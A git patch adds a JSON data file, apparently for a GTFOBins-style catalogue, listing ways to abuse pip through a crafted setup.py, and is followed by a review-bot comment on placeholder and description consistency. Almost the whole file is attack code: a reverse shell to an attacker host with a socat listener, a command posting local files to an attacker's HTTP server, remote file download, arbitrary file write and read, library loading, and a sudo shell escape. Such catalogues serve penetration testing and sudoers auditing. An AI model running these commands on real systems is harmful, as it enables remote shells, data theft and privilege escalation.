From 2a3167fb5a46294df37e954f240fc6b17acc7a86 Mon Sep 17 00:00:00 2001
From: t0thkr1s
Date: Fri, 10 Jan 2020 12:46:37 +0100
Subject: [PATCH] add data for pip
---
data/pip.json | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 53 insertions(+)
create mode 100644 data/pip.json
diff --git a/data/pip.json b/data/pip.json
new file mode 100644
index 0000000..f4d01f8
--- /dev/null
+++ b/data/pip.json
@@ -0,0 +1,53 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "reverse-shell": [
+ {
+ "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+ "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+ "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\npip install $TF\n"
+ },
+ {
+ "description": "Serve files in the local folder running an HTTP server.",
+ "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch a remote file via HTTP GET request. It needs an absolute local file path.",
+ "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")' > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "file-write": [
+ {
+ "description": "It needs an absolute local file path.",
+ "code": "TF=$(mktemp -d)\necho \"open('[file]','w+').write('DATA')\" > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "file-read": [
+ {
+ "description": "The read file content is corrupted as wrapped within an exception error.",
+ "code": "TF=$(mktemp -d)\necho 'raise Exception(open(\"file_to_read\").read())' > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "library-load": [
+ {
+ "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
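Review bot: The `file-read` and `library-load` entries hard-code `file_to_read` and `lib.so`, and `file-write` uses a bare `DATA`, while every other entry in this file marks user-supplied values with brackets (`[file]`, `[url]`, `[host]`, `[port]`). If a consumer of this JSON templates on the bracketed form, these three values would be left as literals, so `open(\"[file]\").read()` would match `file-download` and `file-write`, and the library and data values need a bracketed name of their own. The `shell`, `library-load` and `sudo` entries also have no `description`. A one-line description on `sudo`, such as `"pip install on a local directory executes that directory's setup.py with the privileges pip runs under."`, would tell someone auditing a sudoers rule why allowing `pip` is equivalent to allowing arbitrary code. The `file-read` description would read more clearly as `"The file content is printed inside an exception message, so it may appear mangled."`.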